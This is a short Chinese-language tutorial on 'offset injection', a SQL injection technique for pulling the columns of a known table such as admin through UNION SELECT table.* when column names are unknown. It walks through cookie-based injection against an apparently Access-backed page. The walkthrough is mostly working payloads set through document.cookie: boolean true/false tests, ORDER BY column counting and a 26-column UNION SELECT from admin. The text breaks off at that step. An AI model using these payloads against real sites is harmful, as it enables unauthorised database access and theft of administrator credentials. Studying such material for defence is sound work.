偏移注入简介

使用场景

一些无法查询的列名，比如权限不足的知道表名却不知道字段使用偏移查询主要查询字段及内容等。

使用条件

（1）：知道表名

（2）：注入点的字段数必须要大于查询的字段

常见问题

1 .* 的作用

用于代替表内全部字段，在不能用系统自带库查字段名时。

2.偏移注入是否仅用于Access

不是，mysql也可以使用偏移注入。

3.偏移注释时联合查询后的一张表为什么要小于前一张表

联合查询必须要满足一个条件，就是前面的查询和后面的查询字段数必须相等，因为前面那张表的查询字段数是固定的，后面那张我们控制，但是当你使用admin.* 代表admin整个表的字段，如果admin表字段比前面那个表多，就不符合联合查询。

偏移注入实战

1.判断注入点

document.cookie="ID="+escape("105 and 1=1") 页面显示正常

document.cookie="ID="+escape("105 and 1=2") 页面显示错误

存在注入。

2. 判断当前页面字段总数

document.cookie="ID="+escape("105 and 1=1 order by 26") 页面显示正常

document.cookie="ID="+escape("105 and 1=1 order by 27") 页面显示错误

==》当前页面字段数为 26。

3.爆破表名

在前面已经爆破出了表名 admin Access注入之Cookie注入

4.判断显示位

document.cookie="ID="+escape("105 and 1=2 union select 1121212,2121212,3121212,4121212,5121212,6121212,7121212,8121212,9121212,10121212,11121212,12121212,13121212,14121212,15121212,16121212,17121212,18121212,19121212,20121212,21121212,22121212,23121212,24121212,25121212,26121212 from admin")